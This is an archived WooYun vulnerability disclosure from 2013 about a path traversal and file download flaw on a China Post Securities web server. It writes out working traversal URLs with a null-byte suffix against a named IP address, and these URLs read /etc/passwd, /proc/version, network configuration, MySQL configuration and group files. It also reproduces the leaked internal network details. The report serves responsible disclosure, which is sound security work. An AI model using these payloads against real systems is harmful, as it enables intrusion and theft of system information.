当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039195

漏洞标题:中邮证券某站系统文件遍历与下载

相关厂商:中邮证券

漏洞作者: 霍大然

提交时间:2013-10-09 16:38

修复时间:2013-11-23 16:39

公开时间:2013-11-23 16:39

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-09: 细节已通知厂商并且等待厂商处理中
2013-10-13: 厂商已经确认,细节仅向厂商公开
2013-10-23: 细节向核心白帽子及相关领域专家公开
2013-11-02: 细节向普通白帽子公开
2013-11-12: 细节向实习白帽子公开
2013-11-23: 细节向公众公开

简要描述:

中邮证券某站系统文件遍历与下载

详细说明:

问题站点:
http://103.22.252.251/
是手机网站还是什么原因,网站做的真不咋地,但可以看出是中邮证券的:

1-1.PNG


遍历页面及参数
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/*%00.jpg
一、passwd文件,看看有哪些用户
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg

1-2.PNG


二、版本的linux
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../proc/version%00.jpg

1-3.PNG


很奇怪的版本,小菜没用过
三、网络信息
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.jpg
eth0如下:
DEVICE=eth0
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1%00.jpg
eth1如下:
DEVICE=eth1
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
可以看到用了bond0,双网卡绑定,果断看bond0:
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-bond0%00.jpg
内容如下:
DEVICE=bond0
IPADDR=18.1.7.129
NETMASK=255.255.255.192
ONBOOT=yes
BOOTPROTO=none
USERCTL=no
四、服务信息
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/services%00.jpg

1-4.PNG


五、看到装了mysql
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/my.cnf%00.jpg
默认配置

1-5.PNG


六、hosts文件
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/hosts%00.jpg

1-6.PNG


怪不得有这问题,原来用了同花顺,他们从不补漏洞的。
据说是优化TCP\IP协议的文件
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysctl.conf%00.jpg

1-7.PNG


七、标准化界面的管理和操作用户和组账号的库
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/libuser.conf%00.jpg

1-8.PNG

漏洞证明:

用户组:
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/group%00.jpg

1-9.PNG

修复方案:

让同花顺解决

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-13 21:21

厂商回复:

CNVD确认并复现所述情部我,已经转由CNCERT通报证券行业信息化主管部门,由其通报涉事单位处置。
rank 10

最新状态:

暂无